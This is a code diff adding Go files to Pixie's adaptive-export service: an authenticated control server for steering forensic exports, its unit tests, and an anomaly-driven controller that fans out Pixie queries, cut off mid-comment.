b/src/vizier/services/adaptive_export/internal/control/server.go new file mode 100644 index 00000000000..05837596d6a --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/control/server.go @@ -0,0 +1,237 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package control is the external control surface. It lets the controller +// (the diagnostician) steer this AE (the hands): start/stop exporting a +// target, and order a specific (table, window) query. AE's existing +// kubescape-trigger → controller → activeSet flow is untouched; this is an +// additional, env-gated driver of the same activeSet. Off unless +// CONTROL_ADDR is set. +// +// The handlers depend on narrow interfaces (exporter, queryRunner) — not on +// the concrete Controller — so the package is unit-testable with fakes and so +// the blast radius on AE is a single wiring line in main.go. +package control + +import ( + "bytes" + "context" + "encoding/json" + "net/http" + "strings" + "time" + + jwtutils "px.dev/pixie/src/shared/services/utils" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +// exporter is the slice of *activeset.ActiveSet this package needs: the controller +// decides membership, AE's streaming/controller acts on the deltas. +type exporter interface { + Upsert(k activeset.Key, tEnd time.Time) + Remove(k activeset.Key) +} + +// queryRunner executes one controller-ordered (table, target, window) query and +// writes the result through AE's normal sink. The query_id is carried so +// exported rows can be flagged provisional→confirmed/benign_retire (audit). +type queryRunner interface { + OrderQuery(target anomaly.Target, table string, start, end time.Time, queryID string) error +} + +// graphWriter persists dx evidence-graph edges (newline-delimited JSON, +// JSONEachRow) to forensic_db.dx_attack_graph. nil → /dx/attack_graph 501s. +type graphWriter interface { + WriteAttackGraph(ctx context.Context, jsonEachRow []byte) error +} + +// Server is the control HTTP surface. +type Server struct { + set exporter + runner queryRunner // may be nil; /query then returns 501 + graph graphWriter // may be nil; /dx/attack_graph then returns 501 + mux *http.ServeMux + verify func(bearer string) error // nil → auth disabled; set via SetAuth +} + +// New builds the control server. runner may be nil for deployments that +// only need start/stop (no operator-side one-shot queries). +func New(set exporter, runner queryRunner) *Server { + s := &Server{set: set, runner: runner, mux: http.NewServeMux()} + s.mux.HandleFunc("/healthz", s.handleHealth) + s.mux.HandleFunc("/export/start", s.handleStart) + s.mux.HandleFunc("/export/stop", s.handleStop) + s.mux.HandleFunc("/query", s.handleQuery) + s.mux.HandleFunc("/dx/attack_graph", s.handleDXAttackGraph) + return s +} + +// SetGraphWriter wires the dx_attack_graph sink. +func (s *Server) SetGraphWriter(g graphWriter) { s.graph = g } + +// SetAuth turns on bearer-JWT auth for the control surface, verified with the +// SAME shared lib + signing key the vizier broker/PEM use (px.dev/pixie/src/ +// shared/services/utils). dx already mints a service JWT (GenerateJWTForService, +// PL_JWT_SIGNING_KEY) for its broker/PEM queries — it attaches the same token +// here. No new secret/crypto. /healthz stays open for k8s probes. +// (CodeRabbit: protect control endpoints with auth — server.go.) +func (s *Server) SetAuth(signingKey, audience string) { + s.verify = func(bearer string) error { + _, err := jwtutils.ParseToken(bearer, signingKey, audience) + return err + } +} + +// Handler exposes the mux (for httptest + main.go wiring), wrapped in the auth +// middleware when SetAuth was called. +func (s *Server) Handler() http.Handler { + if s.verify == nil { + return s.mux + } + return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + if r.URL.Path != "/healthz" { // probes stay unauthenticated + const p = "Bearer " + h := r.Header.Get("Authorization") + if !strings.HasPrefix(h, p) || s.verify(strings.TrimPrefix(h, p)) != nil { + w.WriteHeader(http.StatusUnauthorized) + return + } + } + s.mux.ServeHTTP(w, r) + }) +} + +// handleDXAttackGraph ingests a JSON array of dx evidence-graph edges and writes +// them to forensic_db.dx_attack_graph (as JSONEachRow). +func (s *Server) handleDXAttackGraph(w http.ResponseWriter, r *http.Request) { + if r.Method != http.MethodPost { + w.WriteHeader(http.StatusMethodNotAllowed) + return + } + if s.graph == nil { + w.WriteHeader(http.StatusNotImplemented) + return + } + var edges []json.RawMessage + if !decode(r, &edges) { + w.WriteHeader(http.StatusBadRequest) + return + } + if len(edges) == 0 { + w.WriteHeader(http.StatusAccepted) + return + } + var buf bytes.Buffer + for _, e := range edges { + buf.Write(e) + buf.WriteByte('\n') + } + if err := s.graph.WriteAttackGraph(r.Context(), buf.Bytes()); err != nil { + w.WriteHeader(http.StatusBadGateway) + return + } + w.WriteHeader(http.StatusAccepted) +} + +// ── wire types ──────────────────────────────────────────────────────── +type targetReq struct { + Namespace string `json:"namespace"` + Pod string `json:"pod"` + Comm string `json:"comm"` +} + +type startReq struct { + targetReq + TEnd int64 `json:"t_end"` // unix seconds +} + +type queryReq struct { + targetReq + Table string `json:"table"` + Window [2]int64 `json:"window"` // [start,end] unix seconds + QueryID string `json:"query_id"` +} + +func (t targetReq) key() activeset.Key { + return activeset.Key{Namespace: t.Namespace, Pod: t.Pod} +} + +func (t targetReq) target() anomaly.Target { + return anomaly.Target{Comm: t.Comm, Pod: t.Pod, Namespace: t.Namespace} +} + +func decode(r *http.Request, v any) bool { + defer r.Body.Close() + return json.NewDecoder(r.Body).Decode(v) == nil +} + +// ── handlers ────────────────────────────────────────────────────────── +func (s *Server) handleHealth(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(http.StatusOK) +} + +func (s *Server) handleStart(w http.ResponseWriter, r *http.Request) { + if r.Method != http.MethodPost { + w.WriteHeader(http.StatusMethodNotAllowed) + return + } + var req startReq + if !decode(r, &req) || req.Pod == "" || req.TEnd <= 0 { + w.WriteHeader(http.StatusBadRequest) + return + } + s.set.Upsert(req.key(), time.Unix(req.TEnd, 0)) + w.WriteHeader(http.StatusAccepted) +} + +func (s *Server) handleStop(w http.ResponseWriter, r *http.Request) { + if r.Method != http.MethodPost { + w.WriteHeader(http.StatusMethodNotAllowed) + return + } + var req targetReq + if !decode(r, &req) || req.Pod == "" { + w.WriteHeader(http.StatusBadRequest) + return + } + s.set.Remove(req.key()) + w.WriteHeader(http.StatusAccepted) +} + +func (s *Server) handleQuery(w http.ResponseWriter, r *http.Request) { + if r.Method != http.MethodPost { + w.WriteHeader(http.StatusMethodNotAllowed) + return + } + if s.runner == nil { + w.WriteHeader(http.StatusNotImplemented) + return + } + var req queryReq + if !decode(r, &req) || req.Pod == "" || req.Table == "" || req.QueryID == "" || + req.Window[0] <= 0 || req.Window[1] <= 0 || req.Window[0] >= req.Window[1] { + w.WriteHeader(http.StatusBadRequest) + return + } + err := s.runner.OrderQuery(req.target(), req.Table, + time.Unix(req.Window[0], 0), time.Unix(req.Window[1], 0), req.QueryID) + if err != nil { + w.WriteHeader(http.StatusBadGateway) + return + } + w.WriteHeader(http.StatusAccepted) +} diff --git a/src/vizier/services/adaptive_export/internal/control/server_test.go b/src/vizier/services/adaptive_export/internal/control/server_test.go new file mode 100644 index 00000000000..429cdf8a472 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/control/server_test.go @@ -0,0 +1,199 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package control + +import ( + "net/http" + "net/http/httptest" + "strings" + "testing" + "time" + + jwtutils "px.dev/pixie/src/shared/services/utils" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +// fakeExporter records Upsert/Remove calls (the controller → activeSet contract). +type fakeExporter struct { + upserts []activeset.Key + removes []activeset.Key + lastEnd time.Time +} + +func (f *fakeExporter) Upsert(k activeset.Key, tEnd time.Time) { + f.upserts = append(f.upserts, k) + f.lastEnd = tEnd +} +func (f *fakeExporter) Remove(k activeset.Key) { f.removes = append(f.removes, k) } + +// fakeRunner records OrderQuery calls; err controls the failure path. +type fakeRunner struct { + calls []string // "table|ns/pod|queryID" + err error +} + +func (f *fakeRunner) OrderQuery(t anomaly.Target, table string, start, end time.Time, qid string) error { + f.calls = append(f.calls, table+"|"+t.Namespace+"/"+t.Pod+"|"+qid) + return f.err +} + +func do(t *testing.T, srv *Server, method, path, body string) *http.Response { + t.Helper() + req := httptest.NewRequest(method, path, strings.NewReader(body)) + w := httptest.NewRecorder() + srv.Handler().ServeHTTP(w, req) + return w.Result() +} + +// TestControlAuth: with SetAuth on, every endpoint except /healthz requires a +// valid bearer JWT minted by the shared lib (the same one dx uses); missing/bad +// tokens get 401. (CodeRabbit: protect control endpoints with auth.) +func TestControlAuth(t *testing.T) { + const key = "0123456789abcdef0123456789abcdef" // HS256 test key + srv := New(&fakeExporter{}, nil) + srv.SetAuth(key, "vizier") + h := srv.Handler() + + good, err := jwtutils.SignJWTClaims(jwtutils.GenerateJWTForService("dx", "vizier"), key) + if err != nil { + t.Fatalf("mint token: %v", err) + } + call := func(path, auth string) int { + req := httptest.NewRequest(http.MethodPost, path, strings.NewReader(`{"pod":"p","t_end":1}`)) + if auth != "" { + req.Header.Set("Authorization", auth) + } + w := httptest.NewRecorder() + h.ServeHTTP(w, req) + return w.Result().StatusCode + } + if got := call("/export/start", ""); got != http.StatusUnauthorized { + t.Fatalf("no bearer: want 401, got %d", got) + } + if got := call("/export/start", "Bearer not-a-jwt"); got != http.StatusUnauthorized { + t.Fatalf("bad bearer: want 401, got %d", got) + } + if got := call("/export/start", "Bearer "+good); got == http.StatusUnauthorized { + t.Fatalf("valid bearer wrongly rejected (401)") + } + reqH := httptest.NewRequest(http.MethodGet, "/healthz", nil) // probes stay open + wH := httptest.NewRecorder() + h.ServeHTTP(wH, reqH) + if wH.Result().StatusCode == http.StatusUnauthorized { + t.Fatal("/healthz must not require auth") + } +} + +func TestStartExportUpserts(t *testing.T) { + ex := &fakeExporter{} + srv := New(ex, nil) + resp := do(t, srv, http.MethodPost, "/export/start", + `{"namespace":"log4j-poc","pod":"chain-backend-abc","comm":"sh","t_end":1717200600}`) + if resp.StatusCode != http.StatusAccepted { + t.Fatalf("status = %d, want 202", resp.StatusCode) + } + if len(ex.upserts) != 1 || ex.upserts[0].Pod != "chain-backend-abc" || + ex.upserts[0].Namespace != "log4j-poc" { + t.Fatalf("upsert = %+v, want one for log4j-poc/chain-backend-abc", ex.upserts) + } + if ex.lastEnd != time.Unix(1717200600, 0) { + t.Fatalf("tEnd = %v, want 1717200600", ex.lastEnd) + } +} + +func TestStopExportRemoves(t *testing.T) { + ex := &fakeExporter{} + srv := New(ex, nil) + resp := do(t, srv, http.MethodPost, "/export/stop", + `{"namespace":"log4j-poc","pod":"chain-backend-abc"}`) + if resp.StatusCode != http.StatusAccepted { + t.Fatalf("status = %d, want 202", resp.StatusCode) + } + if len(ex.removes) != 1 || ex.removes[0].Pod != "chain-backend-abc" { + t.Fatalf("remove = %+v, want one for chain-backend-abc", ex.removes) + } +} + +func TestOrderQueryRunsAndCarriesID(t *testing.T) { + ex := &fakeExporter{} + rn := &fakeRunner{} + srv := New(ex, rn) + resp := do(t, srv, http.MethodPost, "/query", + `{"namespace":"log4j-poc","pod":"p","comm":"sh","table":"conn_stats","window":[100,200],"query_id":"log4j-poc:p:conn_stats:100-200"}`) + if resp.StatusCode != http.StatusAccepted { + t.Fatalf("status = %d, want 202", resp.StatusCode) + } + if len(rn.calls) != 1 || rn.calls[0] != "conn_stats|log4j-poc/p|log4j-poc:p:conn_stats:100-200" { + t.Fatalf("calls = %v", rn.calls) + } +} + +func TestQueryWithoutRunnerIs501(t *testing.T) { + srv := New(&fakeExporter{}, nil) // no runner wired + resp := do(t, srv, http.MethodPost, "/query", + `{"namespace":"n","pod":"p","table":"conn_stats","window":[1,2],"query_id":"x"}`) + if resp.StatusCode != http.StatusNotImplemented { + t.Fatalf("status = %d, want 501", resp.StatusCode) + } +} + +func TestBadInputRejected(t *testing.T) { + srv := New(&fakeExporter{}, &fakeRunner{}) + // missing pod + if r := do(t, srv, http.MethodPost, "/export/start", `{"namespace":"n"}`); r.StatusCode != http.StatusBadRequest { + t.Fatalf("start no-pod = %d, want 400", r.StatusCode) + } + // malformed json + if r := do(t, srv, http.MethodPost, "/export/stop", `{not json`); r.StatusCode != http.StatusBadRequest { + t.Fatalf("stop bad-json = %d, want 400", r.StatusCode) + } + // query missing table + if r := do(t, srv, http.MethodPost, "/query", `{"pod":"p","query_id":"x","window":[1,2]}`); r.StatusCode != http.StatusBadRequest { + t.Fatalf("query no-table = %d, want 400", r.StatusCode) + } +} + +func TestWrongMethodRejected(t *testing.T) { + srv := New(&fakeExporter{}, &fakeRunner{}) + if r := do(t, srv, http.MethodGet, "/export/start", ``); r.StatusCode != http.StatusMethodNotAllowed { + t.Fatalf("GET start = %d, want 405", r.StatusCode) + } +} + +func TestRunnerErrorIsBadGateway(t *testing.T) { + rn := &fakeRunner{err: errFake} + srv := New(&fakeExporter{}, rn) + r := do(t, srv, http.MethodPost, "/query", + `{"namespace":"n","pod":"p","table":"conn_stats","window":[1,2],"query_id":"x"}`) + if r.StatusCode != http.StatusBadGateway { + t.Fatalf("runner-error = %d, want 502", r.StatusCode) + } +} + +func TestHealthz(t *testing.T) { + srv := New(&fakeExporter{}, nil) + if r := do(t, srv, http.MethodGet, "/healthz", ``); r.StatusCode != http.StatusOK { + t.Fatalf("healthz = %d, want 200", r.StatusCode) + } +} + +type fakeErr struct{} + +func (fakeErr) Error() string { return "boom" } + +var errFake = fakeErr{} diff --git a/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel b/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel new file mode 100644 index 00000000000..5e19fbeaf1e --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel @@ -0,0 +1,44 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "controller", + srcs = ["controller.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + "//src/vizier/services/adaptive_export/internal/kubescape", + "//src/vizier/services/adaptive_export/internal/pxl", + "//src/vizier/services/adaptive_export/internal/reconcile", + "//src/vizier/services/adaptive_export/internal/sink", + "@com_github_sirupsen_logrus//:logrus", + ], +) + +pl_go_test( + name = "controller_test", + srcs = ["controller_test.go"], + embed = [":controller"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + "//src/vizier/services/adaptive_export/internal/kubescape", + "//src/vizier/services/adaptive_export/internal/sink", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/controller/controller.go b/src/vizier/services/adaptive_export/internal/controller/controller.go new file mode 100644 index 00000000000..601c3a27b30 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/controller/controller.go @@ -0,0 +1,760 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package controller orchestrates the adaptive-write push flow on a +// single node: +// +// 1. Subscribe to a Trigger that produces kubescape.Event values. +// 2. For each event, derive the workload anomaly.Target + AnomalyHash, +// look up the in-memory active set for this hostname, and either +// open a new active row or extend an existing one (t_end ← now+after). +// 3. Persist the resulting AttributionRow to ClickHouse via Sink. +// +// The controller does NOT execute PxL itself, does NOT write pixie +// observation rows, and does NOT manage retention scripts. Pixie's +// retention plugin (driven by user-defined PxL scripts in the UI) +// owns those concerns. Operator's only output is forensic_db.adaptive_attribution. +package controller + +import ( + "context" + "sync" + "time" + + log "github.com/sirupsen/logrus" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" +) + +// Trigger is the source of new kubescape events. +type Trigger interface { + Subscribe(ctx context.Context) (<-chan kubescape.Event, error) +} + +// Sink writes attribution rows to ClickHouse and, on boot, can fetch +// still-active rows so the controller can rehydrate after a crash. +// WritePixieRows is the rev-1 fallback path for environments where +// the cloud's retention plugin can't reach the in-cluster CH (so the +// operator queries pixie itself and pushes rows directly). +type Sink interface { + Write(ctx context.Context, rows []sink.AttributionRow) error + QueryActive(ctx context.Context, hostname string) ([]sink.AttributionRow, error) + WritePixieRows(ctx context.Context, table string, rows []map[string]any) error +} + +// PixieQuerier is the rev-1 path's executor: take a PxL string and +// return the resulting rows. nil disables operator-side pixie pushes +// (rev-2 default — the cloud's plugin handles it). +type PixieQuerier interface { + Query(ctx context.Context, pxl string) ([]map[string]any, error) +} + +// Clock abstracts time for tests. +type Clock interface { + Now() time.Time +} + +// RealClock is the production Clock. +type RealClock struct{} + +// Now returns time.Now(). +func (RealClock) Now() time.Time { return time.Now() } + +// Config tunes the controller. Zero values fall through to safe defaults. +type Config struct { + // Hostname is the node-local key. REQUIRED. + Hostname string + + // Rec records per-pull read/wrote counts for the FILTER fan-out path + // (ADAPTIVE_RECONCILE). nil → reconcile.Nop{} in New (instrument off). + Rec reconcile.Recorder + + // Before / After form the time window: t_start = event_time - Before, + // t_end = max(t_end, now + After). Both default to 5 min. + Before time.Duration + After time.Duration + + // PushPixieTables, when non-empty alongside a non-nil Pixie querier, + // makes the controller query pixie for every named table on each + // fresh anomaly window and push the result directly to + // forensic_db.
. Used in environments where the cloud's + // retention plugin can't reach the in-cluster CH service. + PushPixieTables []string + + // PushRefreshInterval — how often pushPixieRows re-queries pixie + // while the attribution window is still active. The first query + // covers [t_start, now]; subsequent queries cover only the new + // per-table slice [last_upper[table], now] so we don't duplicate + // rows. Zero (the natural Go default for unset env vars) is + // rewritten to 30s in defaulted(). To DISABLE periodic re-fan-out + // (single-shot mode, which loses pixie traffic that arrives after + // the kubescape event) set this to a NEGATIVE duration — pick -1 + // to be unambiguous. + PushRefreshInterval time.Duration + + // === Throughput-protection knobs === + // + // At high anomaly rates (many concurrent active hashes), the default + // pushPixieRows behavior — N parallel PxL queries per hash, no + // global cap — can DoS the vizier-query-broker (observed: 90% of + // queries DeadlineExceeded at 180s under 4× sweep load). The three + // knobs below are independent throttles; all default to 0 (= legacy + // unbounded behavior preserved). + // + // MaxParallelQueriesPerHash caps concurrent goroutines INSIDE one + // pushPixieRows pass. 0 = no cap (current). Recommended 3-5 for + // load-protective deployments. + MaxParallelQueriesPerHash int + + // MaxInflightQueriesGlobal caps concurrent PxL queries across all + // pushPixieRows goroutines (every hash). 0 = no cap (current). + // Recommended 20-50 — sized to broker capacity. + MaxInflightQueriesGlobal int + + // EmptyResultSkipAfterN: after this many consecutive 0-row returns + // for the same (pod, table) pair, skip that pair on subsequent + // passes for EmptyResultSkipTTL. 0 = disabled (current). A pgsql + // pod that never speaks HTTP returns 0 on every http_events + // query; skipping eliminates that waste. + EmptyResultSkipAfterN int + + // EmptyResultSkipTTL controls how long a (pod, table) stays in the + // negative cache. 0 = disabled (current). When the TTL expires the + // pair is retried, so a pod that newly starts a protocol + // self-heals within at most TTL seconds. + EmptyResultSkipTTL time.Duration + + // OnAttribution, when non-nil, is called for every event after + // the attribution row has been computed (whether the row is new + // or an extension). The rev-3 streaming path uses this to feed + // its ActiveSet without touching controller internals. + // + // Contract: + // - Called from controller.handle's goroutine. + // - Synchronous; do NOT block. Callbacks that need to do work + // should hand off to a goroutine + buffered channel internally. + // - tEnd is the post-event t_end (= now + After for new rows, + // or the extended value for existing ones). + OnAttribution func(namespace, pod string, tEnd time.Time) + + // OnPrune, when non-nil, is called for each hash evicted by + // PruneExpired with the (namespace, pod) of the evicted row. + // Used by the rev-3 streaming path to shrink its ActiveSet. + // Same contract as OnAttribution: synchronous, non-blocking. + OnPrune func(namespace, pod string) +} + +func (c *Config) defaulted() Config { + out := *c + if out.Before == 0 { + out.Before = 5 * time.Minute + } + if out.After == 0 { + out.After = 5 * time.Minute + } + // Zero → fall through to the 30s default. NEGATIVE values are + // preserved so callers can explicitly request single-shot mode + // (see PushRefreshInterval doc above). + if out.PushRefreshInterval == 0 { + out.PushRefreshInterval = 30 * time.Second + } + return out +} + +// Controller is the live orchestrator. One instance per operator process. +type Controller struct { + trig Trigger + sink Sink + clock Clock + cfg Config + querier PixieQuerier // nil disables operator-side pixie pushes + + mu sync.Mutex + active map[anomaly.AnomalyHash]*sink.AttributionRow + // inFlight tracks hashes whose pushPixieRows goroutine is currently + // running. handle() re-launches the goroutine when the previous one + // has exited (window expired between bursts), so a hash that already + // exists in `active` but is no longer being actively fanned-out + // gets refreshed protocol-table writes on the next alert. Without + // this, the goroutine only spawns on the very first event for a + // hash and subsequent bursts silently stop populating per-table + // rows even though attribution keeps updating in CH. + inFlight map[anomaly.AnomalyHash]bool + + // globalSem is the buffered channel that implements the + // MaxInflightQueriesGlobal throttle. nil → no global cap. + globalSem chan struct{} + + // emptyCacheMu guards emptyStreak and emptySkipUntil. Both are keyed + // by "ns|pod|table" — namespace must be part of the key, otherwise + // same-named pods in different namespaces share suppression state. + emptyCacheMu sync.Mutex + emptyStreak map[string]int // consecutive 0-row returns + emptySkipUntil map[string]time.Time // skip this (ns,pod,table) until this time +} + +// New wires a Controller. nil clock falls through to RealClock. +// nil querier disables the rev-1 push path (controller will only +// write attribution rows; expects cloud's retention plugin to write +// pixie tables). +func New(trig Trigger, snk Sink, cfg Config, clk Clock) *Controller { + if clk == nil { + clk = RealClock{} + } + defaulted := cfg.defaulted() + if defaulted.Rec == nil { + defaulted.Rec = reconcile.Nop{} + } + c := &Controller{ + trig: trig, + sink: snk, + clock: clk, + cfg: defaulted, + active: map[anomaly.AnomalyHash]*sink.AttributionRow{}, + inFlight: map[anomaly.AnomalyHash]bool{}, + emptyStreak: map[string]int{}, + emptySkipUntil: map[string]time.Time{}, + } + if defaulted.MaxInflightQueriesGlobal > 0 { + c.globalSem = make(chan struct{}, defaulted.MaxInflightQueriesGlobal) + } + return c +} + +// WithPixieQuerier wires the rev-1 path. Returns the receiver for +// chaining. Idempotent — call before Run. +func (c *Controller) WithPixieQuerier(q PixieQuerier) *Controller { + c.querier = q + return c +} + +// Rehydrate populates the in-memory active set from ClickHouse so a +// restarted operator picks up where it left off. Idempotent. Call +// once at boot before Run. +func (c *Controller) Rehydrate(ctx context.Context) error { + rows, err := c.sink.QueryActive(ctx, c.cfg.Hostname) + if err != nil { + return err + } + c.mu.Lock() + var resume []sink.AttributionRow + for i := range rows { + row := rows[i] + c.active[row.AnomalyHash] = &row + // Rev-1: a restart restored the window but no pushPixieRows goroutine — + // without this, post-restart Pixie data is silently missed until another + // event for the same hash arrives (CodeRabbit). Re-arm the fan-out for + // each restored window, mirroring handle()'s spawn (in-flight guarded). + if c.querier != nil && len(c.cfg.PushPixieTables) > 0 && !c.inFlight[row.AnomalyHash] { + c.inFlight[row.AnomalyHash] = true + resume = append(resume, row) + } + } + c.mu.Unlock() + for i := range resume { + r := resume[i] + go func() { + defer func() { + c.mu.Lock() + delete(c.inFlight, r.AnomalyHash) + c.mu.Unlock() + }() + c.pushPixieRows(ctx, r) + }() + } + log.WithFields(log.Fields{"rehydrated": len(rows), "resumed": len(resume)}). + Info("controller: active set restored") + return nil +} + +// Run subscribes to the trigger and processes events until ctx is +// cancelled or the trigger closes its channel. Returns ctx.Err() on +// cancellation or nil on graceful trigger shutdown. +func (c *Controller) Run(ctx context.Context) error { + ch, err := c.trig.Subscribe(ctx) + if err != nil { + return err + } + for { + select { + case <-ctx.Done(): + return ctx.Err() + case ev, ok := <-ch: + if !ok { + return nil + } + c.handle(ctx, ev) + } + } +} + +// handle processes one event: open or extend the attribution row, +// then persist to ClickHouse. Errors from Sink.Write are logged but +// not fatal — system stability rule. +func (c *Controller) handle(ctx context.Context, ev kubescape.Event) { + hash := anomaly.Hash(ev.Target) + now := c.clock.Now() + tEvent := eventTimeToTime(ev.EventTime) + + c.mu.Lock() + row, exists := c.active[hash] + if !exists { + row = &sink.AttributionRow{ + AnomalyHash: hash, + Namespace: ev.Target.Namespace, + Pod: ev.Target.Pod, + Comm: ev.Target.Comm, + PID: ev.Target.PID, + Hostname: c.cfg.Hostname, + TStart: tEvent.Add(-c.cfg.Before), + TEnd: now.Add(c.cfg.After), + LastSeen: tEvent, + LastRuleID: ev.RuleID, + NAnomalies: 1, + } + c.active[hash] = row + } else { + // Extend t_end if the new now+after is later. Never shrink. + if proposed := now.Add(c.cfg.After); proposed.After(row.TEnd) { + row.TEnd = proposed + } + // Update last_seen if this event's timestamp is more recent. + if tEvent.After(row.LastSeen) { + row.LastSeen = tEvent + } + row.LastRuleID = ev.RuleID + row.NAnomalies++ + } + snapshot := *row + // Decide AND mark inFlight under the same mutex acquisition so two + // rapid events for the same hash can't both decide to spawn. + spawn := c.querier != nil && len(c.cfg.PushPixieTables) > 0 && !c.inFlight[hash] + if spawn { + c.inFlight[hash] = true + } + c.mu.Unlock() + + if err := c.sink.Write(ctx, []sink.AttributionRow{snapshot}); err != nil { + // Attribution persistence failed → do NOT fan out, or we'd write Pixie + // rows with no persisted attribution anchor (orphaned rows, CodeRabbit). + // Non-fatal (system-stability rule): release the reserved in-flight slot + // and return; a later event for the same hash retries. + log.WithError(err).Warn("controller: sink write failed — skipping fan-out") + if spawn { + c.mu.Lock() + delete(c.inFlight, hash) + c.mu.Unlock() + } + return + } + if c.cfg.OnAttribution != nil { + c.cfg.OnAttribution(snapshot.Namespace, snapshot.Pod, snapshot.TEnd) + } + // Rev-1 path: query pixie for the [t_start, t_end) slice of every + // PushPixieTables table for this (namespace, pod) and write rows + // directly to CH. Done in a goroutine so the controller doesn't + // block on PxL execution (each query can take hundreds of ms; + // N tables sequentially would stall the trigger). Re-spawned on + // every event whose hash currently has no in-flight goroutine + // (covers both brand-new hashes and hashes whose previous + // pushPixieRows exited because the window had quieted down). + if spawn { + go func() { + defer func() { + c.mu.Lock() + delete(c.inFlight, hash) + c.mu.Unlock() + }() + c.pushPixieRows(ctx, snapshot) + }() + } +} + +// pushPixieRows fans out per-table PxL queries and writes the results +// to forensic_db.
. One goroutine per anomaly window. The first +// pass covers [t_start, now]; subsequent passes (every +// PushRefreshInterval) cover only the new slice [last_upper, now] so +// pixie traffic that arrives AFTER the initial kubescape event still +// makes it into CH. Loop exits when the (possibly extended) t_end is +// in the past or ctx is cancelled. All failures are logged + non-fatal. +func (c *Controller) pushPixieRows(ctx context.Context, initial sink.AttributionRow) { + target := anomaly.Target{ + PID: initial.PID, + Comm: initial.Comm, + Pod: initial.Pod, + Namespace: initial.Namespace, + } + log.WithFields(log.Fields{ + "hash": initial.AnomalyHash, + "pod": initial.Pod, + "comm": initial.Comm, + "tables": len(c.cfg.PushPixieTables), + "refresh": c.cfg.PushRefreshInterval, + "t_start": initial.TStart, + "t_end": initial.TEnd, + }).Info("pushPixieRows: starting fan-out") + + // Per-table watermark of pixie data we've already pulled for THIS + // hash. We advance a table's cursor only after BOTH the query AND + // the sink-write succeed; failures keep the cursor in place so the + // next pass retries the same slice instead of dropping it. + lastUpper := make(map[string]time.Time, len(c.cfg.PushPixieTables)) + for _, t := range c.cfg.PushPixieTables { + lastUpper[t] = initial.TStart + } + pass := 0 + for { + if ctx.Err() != nil { + return + } + // Re-snapshot the active row each iteration so we pick up t_end + // extensions from concurrent kubescape events (extending the + // window beyond the initial t_end). COPY the row out of the + // shared pointer before releasing the mutex — handle() mutates + // the same struct, so reading TEnd after Unlock would race. + c.mu.Lock() + live, exists := c.active[initial.AnomalyHash] + var current sink.AttributionRow + if exists { + current = *live + } + c.mu.Unlock() + if !exists { + log.WithField("hash", initial.AnomalyHash). + Info("pushPixieRows: window closed (active entry gone)") + return + } + now := c.clock.Now() + if !current.TEnd.After(now) { + log.WithFields(log.Fields{ + "hash": initial.AnomalyHash, + "t_end": current.TEnd, + }).Info("pushPixieRows: fan-out complete (window expired)") + return + } + + pass++ + // Fan out the per-table PxL queries IN PARALLEL. The serial + // rev-1 loop spent 1.5-5s per refresh waiting for the 9 tables + // that return 0 rows for this pod (a redis-server pod only ever + // has data in redis_events; the other 9 queries are pure + // latency tax). Parallel cuts the per-pass wall time to roughly + // max(query_time) instead of sum(query_times). Each goroutine + // runs an independent Pixie RPC; the cloud's PassThroughProxy + // fans them across vizier-query-broker fine in our measurements + // (10 simultaneous in-flight queries → ~250-700ms wall vs + // 